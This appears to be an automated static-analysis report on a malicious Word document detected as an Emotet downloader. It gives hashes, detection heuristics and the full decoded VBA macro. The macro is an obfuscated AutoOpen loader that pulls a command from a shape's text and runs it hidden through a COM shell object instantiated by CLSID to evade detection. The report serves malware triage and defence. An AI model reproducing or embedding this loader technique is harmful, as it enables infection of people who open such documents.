Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b33fe412dd45369f…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 81.1 KB
Created: 2018-11-26 19:43:00
Authoring application: Microsoft Office Word
First seen: 2019-11-20
MD5: c4ff2c8544ac826d8f47fa4589a05ff0
SHA-1: 94e8495a434e8ae195c8657c3490497f6f6457ce
SHA-256: b33fe412dd45369f564a7c5535088cfe99fc37013f4f46eb857d61e2d9300c1e
Risk score: 252

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6826431-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826431-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
          End Select
    Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
          End Select
    Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5749 bytes
SHA-256: 741a5d0d0e0d2f2f26ad79d991a1e862a361b8149aa7ff831a277278eb5c7876
Detection
ClamAV: No threats found
Obfuscation or payload: likely
105 of 156 identifiers look randomly generated (e.g. 'KiQHBHzjqo') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "NfhRrib"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
      Select Case VLdwEK
         Case 15131936
            GCJFwzJmV = 312165642
            ZrCbQzsSd = CLng(327202709)
         Case 226308632
            JJjUjGL = Oct(tBOJWbzr)
            ZLpzoPW = kNwLsY
         Case 294776129
            czvPccj = CDate(MwXdtE)
            BAwElsbV = Int(306937547 * BvtOWA)
      End Select
   On Error Resume Next
      Select Case kMLDHOmm
         Case 127526074
            wckwbvXXl = 10628416
            aVzNNi = CLng(57406342)
         Case 295022822
            kpqLimBJ = Oct(zHZiznMB)
            uAilh = QJqMq
         Case 301667795
            iulJGlZN = CDate(uOsmuurY)
            BMaNsz = Int(334639252 * qvYvp)
      End Select
   On Error Resume Next
      Select Case cQVTLE
         Case 63613879
            FtwBZR = 103661861
            iurwmSUKv = CLng(251765696)
         Case 285218744
            ASJwwk = Oct(QQditjtBS)
            wzmrMi = oEjJwLXZN
         Case 324437860
            njzDoS = CDate(cFPzOsQBs)
            mEUnnNKtE = Int(269297437 * FFFjmf)
      End Select
   On Error Resume Next
      Select Case kZGcod
         Case 27149875
            MdLdj = 200518866
            ALBYmXoGX = CLng(225338729)
         Case 149182203
            zZIPFE = Oct(LFjQQSCS)
            liGuw = kwlHSpwS
         Case 228198655
            RPGfEOFYz = CDate(rRvkFk)
            jVobb = Int(115288969 * pMiwm)
      End Select
Set TvLTskZj = Shapes("zcYICaAl")
   On Error Resume Next
      Select Case bpLNaWYN
         Case 170293607
            btZLYAWnp = 122552508
            SiIkU = CLng(282292005)
         Case 302299572
            HoGtPz = Oct(QpnJvqrEw)
            FHzJjaXNh = HDdFj
         Case 201988746
            SCVzKLdkj = CDate(fWOaiLqOj)
            IXOifhqnM = Int(77471184 * dRuYBatv)
      End Select
   On Error Resume Next
      Select Case siRVEHKw
         Case 328682984
            LnimNzKiZ = 339408030
            cAift = CLng(330037178)
         Case 94407295
            zuQvYZkD = Oct(iUjhFh)
            hlhjKc = mtfQh
         Case 257934290
            LJwJwCvr = CDate(NdtrD)
            TYWTS = Int(334976911 * QicXm)
      End Select
   On Error Resume Next
      Select Case UzWMI
         Case 50940566
            jjRbbU = 78212833
            zhmufTlf = CLng(325890287)
         Case 141247575
            kisAiR = Oct(RBKJXcw)
            uLFKOFA = UoLvP
         Case 283886450
            TZrpXjqf = CDate(KzCKVoJK)
            GYaZmHNjX = Int(161537658 * SVOaTq)
      End Select
   On Error Resume Next
      Select Case IcOnZTZf
         Case 12214148
            JplwhAHp = 153678308
            LDbAw = CLng(208601453)
         Case 84029814
            jDwaVY = Oct(YOwYAO)
            hliBDQaJM = TXVFBNrt
         Case 42579489
            wwliTN = CDate(IlLRXuSV)
            VucvoWrMG = Int(327251806 * GXAEi)
      End Select
KiQHBHzjqo = "" + JDQiSKjY + QpfUDRk + TvLTskZj.TextFrame.TextRange.Text + hbPRpN + ZHtNUqD + cMktjA
   On Error Resume Next
      Select Case jZBKIi
         Case 8276858
            NPJmflS = 186192330
            mTlTr = CLng(226914952)
         Case 207270491
            rduGAzLb = Oct(vwRVTUizb)
            KbwCQE = iJcqrr
         Case 146621912
            RAGQNSw = CDate(jpTKl)
            wDUQRU = Int(66224729 * adBjOBzFD)
      End Select
Set FqTTzQNYu = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + wBTbjNzMR)
   On Error Resume Next
      Select Case zZIPYUA
         Case 541397
            QSuNCVO = 233435738
            saiREHjb = CLng(56873109)
         Case 97211930
            kZMVu = Oct(OznORN)
            QEYKIQMp = ipppfVBj
         Case 322489168
            lwqqFY = CDate(lGOvRa)
            wAziZT = Int(291729254 * OEvWj)
      End Select
   On Error Resume Next
      Select Case hiswVivQG
         Case 233192990
            liqwiwm = 163074422
            tWpMw = CLng(43829233)
         Case 176409652
            FkvKi = Oct(HmmdPUW)
            mzmucNAMd = DZzLojCOH
         Case 278426237
            VnQHJi = CDate(sTWElC)
            sZCiNEsH = Int(338007662 * EWwzG)
      End Select
Const iflKAuswi = 0
   On Error Resume Next
      Select Case zmwZRf
         Case 20356153
            iVqvDwlRB = 181861349
            hjWGrmK = CLng(75256157)
         Case 271310302
            SwwLptN = Oct(dPnXl)
            CjONpTOBY = NkdjH
         Case 251644728
            UNdLX = CDate(jNCYMXMkK)
            jDKYwVWGR = Int(171246929 * wFQhzrITJ)
      End Select
   On Error Resume Next
      Select Case olsGnSksb
         Case 202738348
            LvMtrlDkD = 127267149
            GnvRMapCt = CLng(272692696)
         Case 232593572
            LjtBnSiv = Oct(iDbZV)
            LaCncj = fEKWFJDZ
         Case 245228971
            cGBKw = CDate(QRYYwXkT)
            rMdbqCGIX = Int(22600673 * qQNVrdzz)
      End Select
FqTTzQNYu.Run! KiQHBHzjqo, iflKAuswi
   On Error Resume Next
      Select Case zURlkio
         Case 294353168
            ADowIECwu = 31374145
            TNPQTGj = CLng(206168440)
         Case 283664432
            SlNBFzjER = Oct(hBFiXOpF)
            sVZAZL = EBRdzIBB
         Case 223332389
            bwCHSs = CDate(PtRHhtF)
            dOwTtl = Int(259411127 * VsinnqYAE)
      End Select
End Sub